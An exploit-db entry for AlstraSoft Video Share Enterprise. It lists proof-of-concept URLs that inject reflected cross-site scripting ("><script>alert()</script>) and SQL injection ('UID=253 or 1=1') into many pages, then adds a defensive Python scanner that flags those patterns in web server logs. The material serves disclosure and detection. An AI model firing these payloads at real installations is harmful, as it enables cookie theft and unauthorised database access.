- 18 Dec 2022
- EDB-ID: 30366
- EDB verification: Passed
- Author: LOSTMON
- Vulnerability type: WEBAPPS
- Platform: PHP
- CVE: N/A
- Publication date: 2007-07-23
Code:
source: https://www.securityfocus.com/bid/25019/info
AlstraSoft Video Share Enterprise is affected by multiple input-validation vulnerabilities. These issues include multiple cross-site scripting vulnerabilities and multiple SQL-injection vulnerabilities.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, execute arbitrary script code in the context of the webserver process, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://[Victim]/videoshare/view_video.php?viewkey=
9c1d0e3b9ccc3ab651bc&msg=Your+feature+request+is+
sent+"><script>alert()</script>
http://[Victim]/videoshare/view_video.php?viewkey=
9c1d0e3b9ccc3ab651bc&page=10">&viewtype=&category=mr
http://[Victim]/videoshare/view_video.php?viewkey=
9c1d0e3b9ccc3ab651bc"><script>alert()</script>
http://[Victim]/videoshare/signup.php?
next=upload"><script>alert()</script>
http://[Victim]/videoshare/search_result.php?
search_id=ghgdgdfd"><script>alert()</script>
http://[Victim]/videoshare/view_video.php?
viewkey=d9607ee5a9d336962c53&page=1&viewtype=">&category=mr
http://[Victim]/videoshare/video.php?
category=tf"><script>alert()</script>&viewtype=
http://[Victim]/videoshare/video.php?
page=5"><script>alert()</script>
http://[Victim]/videoshare/compose.php?
receiver=demo"><script>alert()</script>
http://[Victim]/videoshare/groups.php?
b=ra&catgy=Recently%20Added"><script>alert()</script>
http://[Victim]/videoshare/siteadmin/
channels.php?a=Search&channelid=&channelname=%22
%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&search=Search
http://[Victim]/videoshare/siteadmin/muser.php?
[email protected]&uname=GLAMOROUS"><script>alert()</script>
http://[Victim]/videoshare/gmembers.php?urlkey=gshahzad&gid=9%20or%201=1
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1
http://[Victim]/videoshare/ugroups.php?UID=253%20or%201=1
http://[Victim]/videoshare/uprofile.php?UID=253%20or%201=1
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=public
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=private
http://[Victim]/videoshare/ufavour.php?UID=253 or 1=1
http://[Victim]/videoshare/ufriends.php?UID=253 or 1=1
http://[Victim]/videoshare/uplaylist.php?UID=253 or 1=1
http://[Victim]/videoshare/ugroups.php?UID=253 or 1=1
- Source: www.exploit-db.com
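For defenders reviewing traffic to an affected install, the following is an added example (not part of the original advisory or the exploit-db entry) that scans access-log lines for the two input patterns listed above: non-numeric values in the `UID` and `gid` identifiers, and HTML metacharacters in any other query parameter. The Apache combined log format, the sample log lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters that the advisory's SQL-injection URLs use as numeric identifiers.
NUMERIC_PARAMS = {"UID", "gid"}
DIGITS = re.compile(r"[0-9]+")
# Characters needed to close an HTML attribute and open a new tag.
MARKUP = re.compile(r'[<>"]')
# Request line inside an Apache "combined" log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP range, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.7 - - [01/Jan/2024:10:00:00 +0000] "GET /videoshare/uvideos.php?UID=253&type=public HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /videoshare/uvideos.php?UID=253%20or%201=1 HTTP/1.1" 200 9000',
    '192.0.2.7 - - [01/Jan/2024:10:00:09 +0000] "GET /videoshare/view_video.php?viewkey=9c1d0e3b9ccc3ab651bc&page=1 HTTP/1.1" 200 7000',
    '192.0.2.11 - - [01/Jan/2024:10:00:12 +0000] "GET /videoshare/video.php?page=5%22%3E%3Cscript%3Ealert()%3C/script%3E HTTP/1.1" 200 6100',
]

def check_target(target):
    """Return (param, reason) findings for one request target (path + query)."""
    findings = []
    # parse_qsl percent-decodes values, so %22%3E and raw "> look the same here.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name in NUMERIC_PARAMS:
            # An identifier should be plain digits; anything else is suspect.
            if not DIGITS.fullmatch(value):
                findings.append((name, "non-numeric id"))
        elif MARKUP.search(value):
            findings.append((name, "html metacharacters"))
    return findings

def scan(lines):
    """Return (line_number, client, param, reason) for each suspicious request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue  # not a request line we understand
        client = line.split(" ", 1)[0]
        for param, reason in check_target(match.group(1)):
            hits.append((number, client, param, reason))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit shows that a request carried one of these input patterns, not that it succeeded; the same two checks (digits-only identifiers, output encoding of reflected parameters) are what the application itself needs server-side.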